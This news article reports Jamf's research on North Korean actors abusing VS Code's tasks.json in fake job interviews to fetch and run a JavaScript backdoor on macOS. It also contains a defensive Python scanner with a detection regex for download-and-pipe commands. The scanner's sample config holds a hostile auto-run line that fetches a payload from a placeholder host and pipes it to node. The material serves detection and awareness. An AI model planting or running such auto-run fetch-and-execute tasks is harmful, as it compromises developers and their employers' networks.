- Lazarus Group’s Contagious Interview campaign abuses Visual Studio Code via malicious Git repositories.
- Attackers serve JavaScript payloads to macOS, enabling persistent data collection and C2 communication.
- Jamf recommends enabling advanced threat controls and being careful with untrusted repositories.
As part of the infamous Contagious Interview campaign, North Korean actors were seen abusing the legitimate Microsoft Visual Studio Code editor in their attacks.
Contagious Interview is a hacking campaign in which the Lazarus Group (and other state-sponsored North Korean actors) creates fake jobs and invites software and blockchain developers in Western countries for interviews.
During the interview process, they trick victims into deploying malware on their devices, granting the attackers unrestricted access to their computers, as well as their current employers’ networks.
The campaign has also been highly successful; it is blamed for some of the biggest crypto heists in recent years.
In a new report, Jamf security researchers detailed “an evolution in the techniques used during the early stages of the campaign.” They said attackers would first create a malicious Git repository and host it on platforms such as GitHub or GitLab.
After that, during the “maintenance” process, they would trick the victim into cloning the repository and opening it in Microsoft Visual Studio Code. The editor prompts the victim to trust the repository’s authors; if they do, it automatically processes the tasks.json configuration file, which triggers arbitrary built-in commands.
On macOS, these commands use a background shell to remotely fetch a JavaScript payload (often from a platform like Vercel) and pipe it to the Node.js runtime.
The JavaScript payload then executes, establishing a persistent loop that collects host information (host name, MAC addresses, and operating system details) and communicates with a remote command and control (C2) server. The backdoor periodically pings the C2 server, sending system data and receiving further malicious JavaScript instructions.
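A defender-side check in the spirit of Jamf’s advice to review a repository before trusting it: this is an added example, not Jamf’s or TechRadar’s code, that scans a cloned repository’s .vscode/tasks.json for tasks configured to run when the folder is opened and for shell commands that pipe downloaded content into an interpreter. The runOptions.runOn setting is a real VS Code option; the sample tasks.json and its URL are constructed for illustration.

```python
"""Scan a repository's .vscode/tasks.json for tasks that run automatically
on folder open and/or pipe remotely fetched content into an interpreter."""
import json
import re

# A download tool whose output is piped into a script interpreter: the
# shape of the command the article describes (fetch JavaScript, pipe to node).
FETCH_RE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(node|sh|bash|python3?|osascript)\b")

def strip_jsonc(text: str) -> str:
    """Remove // and /* */ comments and trailing commas (VS Code accepts JSONC).
    Naive: a '//' at the start of a line inside a string would also be dropped."""
    text = re.sub(r"/\*.*?\*/", "", text, flags=re.S)
    text = re.sub(r"^\s*//.*$", "", text, flags=re.M)
    text = re.sub(r",(\s*[}\]])", r"\1", text)
    return text

def task_command(task: dict) -> str:
    """Join the task's command and args into one string for inspection."""
    parts = [str(task.get("command", ""))] + [str(a) for a in task.get("args", [])]
    return " ".join(parts)

def find_suspicious_tasks(tasks_json: str) -> list:
    """Return (label, reasons) for every task that auto-runs or fetch-pipes."""
    data = json.loads(strip_jsonc(tasks_json))
    findings = []
    for task in data.get("tasks", []):
        reasons = []
        # runOptions.runOn == "folderOpen" is VS Code's auto-run-on-open setting
        if task.get("runOptions", {}).get("runOn") == "folderOpen":
            reasons.append("runs automatically when the folder is opened")
        if task.get("type") == "shell" and FETCH_RE.search(task_command(task)):
            reasons.append("downloads remote content and pipes it to an interpreter")
        if reasons:
            findings.append((task.get("label", "<unlabelled>"), reasons))
    return findings

# Constructed sample modelled on the described behaviour; the URL is a placeholder.
SAMPLE_TASKS_JSON = """{
  // build helpers
  "version": "2.0.0",
  "tasks": [
    {"label": "lint", "type": "shell", "command": "npm run lint"},
    {"label": "setup", "type": "shell",
     "command": "curl -s https://example.invalid/payload.js | node",
     "runOptions": {"runOn": "folderOpen"},},
  ]
}"""

if __name__ == "__main__":
    for label, reasons in find_suspicious_tasks(SAMPLE_TASKS_JSON):
        print(f"[!] task {label!r}: " + "; ".join(reasons))
```

Run it against a freshly cloned repository before clicking “trust” in the Workspace Trust prompt; a hit on the auto-run setting alone is worth a manual look even when the command appears harmless.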
“We strongly recommend that customers ensure that Threat Prevention and Advanced Threat Controls are enabled and configured in blocking mode in Jamf for Mac to remain protected against the techniques described in this research,” Jamf warned.
“Developers should remain cautious when interacting with third-party repositories, especially those shared directly or from unknown sources. Before marking a repository as trusted in Visual Studio Code, it is important to review its contents,” they added.